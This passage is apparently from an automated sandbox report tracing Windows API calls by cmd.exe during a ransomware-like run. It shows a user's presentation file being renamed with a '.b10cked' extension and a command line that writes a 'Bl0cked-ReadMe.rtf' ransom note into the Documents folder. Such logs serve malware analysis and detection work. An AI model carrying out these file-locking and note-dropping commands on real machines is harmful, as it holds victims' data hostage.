locale=".OCP") returned="English_United States.437" [0236.678] GetConsoleTitleW (in: lpConsoleTitle=0xd08c0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.678] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.678] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0236.678] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0236.678] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0236.679] _wcsicmp (_String1="move", _String2=")") returned 68 [0236.679] _wcsicmp (_String1="FOR", _String2="move") returned -7 [0236.679] _wcsicmp (_String1="FOR/?", _String2="move") returned -7 [0236.679] _wcsicmp (_String1="IF", _String2="move") returned -4 [0236.679] _wcsicmp (_String1="IF/?", _String2="move") returned -4 [0236.679] _wcsicmp (_String1="REM", _String2="move") returned 5 [0236.679] _wcsicmp (_String1="REM/?", _String2="move") returned 5 [0236.681] GetConsoleTitleW (in: lpConsoleTitle=0x2cf5a0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0236.681] _wcsicmp (_String1="move", _String2="DIR") returned 9 [0236.681] _wcsicmp (_String1="move", _String2="ERASE") returned 8 [0236.681] _wcsicmp (_String1="move", _String2="DEL") returned 9 [0236.681] _wcsicmp (_String1="move", _String2="TYPE") returned -7 [0236.681] _wcsicmp (_String1="move", _String2="COPY") returned 10 [0236.681] _wcsicmp (_String1="move", _String2="CD") returned 10 [0236.681] _wcsicmp (_String1="move", _String2="CHDIR") returned 10 [0236.681] _wcsicmp (_String1="move", _String2="RENAME") returned -5 [0236.681] _wcsicmp (_String1="move", _String2="REN") returned -5 [0236.681] _wcsicmp (_String1="move", _String2="ECHO") returned 8 [0236.681] _wcsicmp (_String1="move", _String2="SET") returned -6 [0236.681] _wcsicmp (_String1="move", _String2="PAUSE") returned -3 [0236.681] _wcsicmp (_String1="move", _String2="DATE") returned 9 [0236.681] _wcsicmp (_String1="move", _String2="TIME") returned -7 [0236.681] _wcsicmp (_String1="move", _String2="PROMPT") returned -3 [0236.681] _wcsicmp (_String1="move", _String2="MD") returned 11 [0236.682] _wcsicmp (_String1="move", _String2="MKDIR") returned 4 [0236.682] _wcsicmp (_String1="move", _String2="RD") returned -5 [0236.682] _wcsicmp (_String1="move", _String2="RMDIR") returned -5 [0236.682] _wcsicmp (_String1="move", _String2="PATH") returned -3 [0236.682] _wcsicmp (_String1="move", _String2="GOTO") returned 6 [0236.682] _wcsicmp (_String1="move", _String2="SHIFT") returned -6 [0236.682] _wcsicmp (_String1="move", _String2="CLS") returned 10 [0236.682] _wcsicmp (_String1="move", _String2="CALL") returned 10 [0236.682] _wcsicmp (_String1="move", _String2="VERIFY") returned -9 [0236.682] _wcsicmp (_String1="move", _String2="VER") returned -9 [0236.682] _wcsicmp (_String1="move", _String2="VOL") returned -9 [0236.682] _wcsicmp (_String1="move", _String2="EXIT") returned 8 [0236.682] _wcsicmp (_String1="move", _String2="SETLOCAL") returned -6 [0236.682] _wcsicmp (_String1="move", _String2="ENDLOCAL") returned 8 [0236.682] _wcsicmp (_String1="move", _String2="TITLE") returned -7 [0236.682] _wcsicmp (_String1="move", _String2="START") returned -6 [0236.682] _wcsicmp (_String1="move", _String2="DPATH") returned 9 [0236.682] _wcsicmp (_String1="move", _String2="KEYS") returned 2 [0236.682] _wcsicmp (_String1="move", _String2="MOVE") returned 0 [0236.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0236.683] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0236.683] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cf35c, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cf354, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cf354*=0x90c08a66, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0236.684] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0236.685] _wcsnicmp (_String1="/Y", _String2="/Y", _MaxCount=0x2) returned 0 [0236.685] _wcsicmp (_String1="NGDM~1.PPT", _String2=".") returned 64 [0236.685] _wcsicmp (_String1="NGDM~1.PPT", _String2="..") returned 64 [0236.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm~1.ppt")) returned 0x20 [0236.685] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xe1d28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0236.685] SetErrorMode (uMode=0x0) returned 0x0 [0236.685] SetErrorMode (uMode=0x1) returned 0x0 [0236.685] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", nBufferLength=0x104, lpBuffer=0x2cece4, lpFilePart=0x2ceccc | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", lpFilePart=0x2ceccc*="NGDM~1.PPT") returned 0x24 [0236.685] SetErrorMode (uMode=0x0) returned 0x1 [0236.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1" (normalized: "c:\\users\\eebsym5\\docume~1")) returned 0x13 [0236.685] _wcsicmp (_String1="NGDM~1.PPT", _String2=".") returned 64 [0236.685] _wcsicmp (_String1="NGDM~1.PPT", _String2="..") returned 64 [0236.685] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm~1.ppt")) returned 0x20 [0236.685] SetErrorMode (uMode=0x0) returned 0x0 [0236.685] SetErrorMode (uMode=0x1) returned 0x0 [0236.685] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", nBufferLength=0x104, lpBuffer=0x2cf160, lpFilePart=0x2ceef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", lpFilePart=0x2ceef8*="NGDM~1.PPT") returned 0x24 [0236.686] SetErrorMode (uMode=0x0) returned 0x1 [0236.686] SetErrorMode (uMode=0x0) returned 0x0 [0236.686] SetErrorMode (uMode=0x1) returned 0x0 [0236.686] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x2cf368, lpFilePart=0x2ceef8 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked", lpFilePart=0x2ceef8*="Ngdm.pptx.b10cked") returned 0x2b [0236.686] SetErrorMode (uMode=0x0) returned 0x1 [0236.686] SetLastError (dwErrCode=0x0) [0236.686] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm.pptx.b10cked")) returned 0xffffffff [0236.686] GetLastError () returned 0x2 [0236.686] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", fInfoLevelId=0x1, lpFindFileData=0x2ce874, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ce874) returned 0xd0eb8 [0236.686] FindNextFileW (in: hFindFile=0xd0eb8, lpFindFileData=0x2ce874 | out: lpFindFileData=0x2ce874) returned 0 [0236.686] GetLastError () returned 0x12 [0236.686] FindClose (in: hFindFile=0xd0eb8 | out: hFindFile=0xd0eb8) returned 1 [0236.687] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\NGDM~1.PPT", fInfoLevelId=0x1, lpFindFileData=0xe1ac8, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0xe1ac8) returned 0xd0eb8 [0236.687] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked", nBufferLength=0x104, lpBuffer=0x2ceb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked", lpFilePart=0x0) returned 0x2b [0236.687] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx", nBufferLength=0x104, lpBuffer=0x2ceb0c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx", lpFilePart=0x0) returned 0x23 [0236.687] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm.pptx")) returned 0x20 [0236.687] MoveFileExW (lpExistingFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm.pptx"), lpNewFileName="C:\\Users\\EEBsYm5\\DOCUME~1\\Ngdm.pptx.b10cked" (normalized: "c:\\users\\eebsym5\\docume~1\\ngdm.pptx.b10cked"), dwFlags=0x3) returned 1 [0236.688] FindClose (in: hFindFile=0xd0eb8 | out: hFindFile=0xd0eb8) returned 1 [0236.688] _vsnwprintf (in: _Buffer=0x4a855040, _BufferCount=0x103, _Format="%9d", _ArgList=0x2ceac0 | out: _Buffer=" 1") returned 9 [0236.688] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.688] GetFileType (hFile=0x7) returned 0x2 [0237.012] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0237.012] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cea4c | out: lpMode=0x2cea4c) returned 1 [0237.012] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.012] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x2cea80 | out: lpConsoleScreenBufferInfo=0x2cea80) returned 1 [0237.013] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a864640, nSize=0x2000, Arguments=0x0 | out: lpBuffer="%1 file(s) moved.\r\n") returned 0x13 [0237.013] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x236e, dwLanguageId=0x0, lpBuffer=0x4a864640, nSize=0x2000, Arguments=0x2ceac0 | out: lpBuffer=" 1 file(s) moved.\r\n") returned 0x1a [0237.013] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a864640*, nNumberOfCharsToWrite=0x1a, lpNumberOfCharsWritten=0x2ceaa4, lpReserved=0x0 | out: lpBuffer=0x4a864640*, lpNumberOfCharsWritten=0x2ceaa4*=0x1a) returned 1 [0237.013] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.013] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0237.014] _get_osfhandle (_FileHandle=1) returned 0x7 [0237.014] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0237.014] _get_osfhandle (_FileHandle=0) returned 0x3 [0237.014] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0237.014] SetConsoleInputExeNameW () returned 0x1 [0237.014] GetConsoleOutputCP () returned 0x1b5 [0237.014] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0237.014] SetThreadUILanguage (LangId=0x0) returned 0x409 [0237.014] exit (_Code=0) Process: id = "651" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea166c0" os_pid = "0xc50" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\EEBsYm5\\DOCUME~1\\Bl0cked-ReadMe.rtf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 35792 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 35793 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 35794 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 35795 start_va = 0x1f0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 35796 start_va = 0x4a830000 end_va = 0x4a87bfff entry_point = 0x4a830000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 35797 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 35798 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 35799 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 35800 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 35801 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 35826 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 35827 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 35828 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 35829 start_va = 0x1c0000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 35830 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 35831 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 35832 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 35833 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 35834 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 35835 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 35836 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 35837 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 35838 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 35839 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 35840 start_va = 0xc0000 end_va = 0x187fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 35841 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 35842 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 35843 start_va = 0x190000 end_va = 0x196fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 35844 start_va = 0x1a0000 end_va = 0x1a1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 35845 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 35846 start_va = 0x1d0000 end_va = 0x1d0fff entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 35847 start_va = 0x4d0000 end_va = 0x5d0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 35848 start_va = 0x5e0000 end_va = 0x11dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005e0000" filename = "" Region: id = 35849 start_va = 0x11e0000 end_va = 0x1342fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011e0000" filename = "" Thread: id = 892 os_tid = 0x678 [0236.981] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2efa9c | out: lpSystemTimeAsFileTime=0x2efa9c*(dwLowDateTime=0xc0b6b0e0, dwHighDateTime=0x1d440a9)) [0236.981] GetCurrentProcessId () returned 0xc50 [0236.981] GetCurrentThreadId () returned 0x678 [0236.981] GetTickCount () returned 0x41035 [0236.981] QueryPerformanceCounter (in: lpPerformanceCount=0x2efa94 | out: lpPerformanceCount=0x2efa94*=29377070463) returned 1 [0236.982] GetModuleHandleA (lpModuleName=0x0) returned 0x4a830000 [0236.982] __set_app_type (_Type=0x1) [0236.982] __p__fmode () returned 0x76b331f4 [0236.982] __p__commode () returned 0x76b331fc [0236.982] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a8521a6) returned 0x0 [0236.982] __getmainargs (in: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c, _DoWildCard=0, _StartInfo=0x4a854140 | out: _Argc=0x4a854238, _Argv=0x4a854240, _Env=0x4a85423c) returned 0 [0236.982] GetCurrentThreadId () returned 0x678 [0236.982] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x678) returned 0x38 [0236.982] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0236.983] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0236.983] SetThreadUILanguage (LangId=0x0) returned 0x409 [0236.983] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0236.983] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x2efa2c | out: phkResult=0x2efa2c*=0x0) returned 0x2 [0236.983] VirtualQuery (in: lpAddress=0x2efa63, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x2ef000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.983] VirtualQuery (in: lpAddress=0x1f0000, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x1f0000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0236.983] VirtualQuery (in: lpAddress=0x1f1000, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x1f1000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0236.983] VirtualQuery (in: lpAddress=0x1f3000, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x1f3000, AllocationBase=0x1f0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0236.983] VirtualQuery (in: lpAddress=0x2f0000, lpBuffer=0x2ef9fc, dwLength=0x1c | out: lpBuffer=0x2ef9fc*(BaseAddress=0x2f0000, AllocationBase=0x0, AllocationProtect=0x0, RegionSize=0xe0000, State=0x10000, Protect=0x1, Type=0x0)) returned 0x1c [0236.983] GetConsoleOutputCP () returned 0x1b5 [0236.983] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a854260 | out: lpCPInfo=0x4a854260) returned 1 [0236.983] SetConsoleCtrlHandler (HandlerRoutine=0x4a84e72a, Add=1) returned 1 [0236.983] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.983] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0236.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.984] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a8541ac | out: lpMode=0x4a8541ac) returned 1 [0236.984] _get_osfhandle (_FileHandle=1) returned 0x7 [0236.984] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0236.984] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.984] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a8541b0 | out: lpMode=0x4a8541b0) returned 1 [0236.984] _get_osfhandle (_FileHandle=0) returned 0x3 [0236.984] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0236.984] GetEnvironmentStringsW () returned 0x3e0168* [0236.984] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0236.984] GetEnvironmentStringsW () returned 0x3e0168* [0236.985] FreeEnvironmentStringsW (penv=0x3e0168) returned 1 [0236.985] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x2ee99c | out: phkResult=0x2ee99c*=0x40) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x90, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x1, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x1, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x0, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x40, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x4, lpData=0x2ee9a8*=0x40, lpcbData=0x2ee9a0*=0x4) returned 0x0 [0236.985] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x2ee9a4, lpData=0x2ee9a8, lpcbData=0x2ee9a0*=0x1000 | out: lpType=0x2ee9a4*=0x0, lpData=0x2ee9a8*=0x40, lpcbData=0x2ee9a0*=0x1000) returned 0x2 [0236.985] RegCloseKey (hKey=0x40) returned 0x0 [0236.985] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", 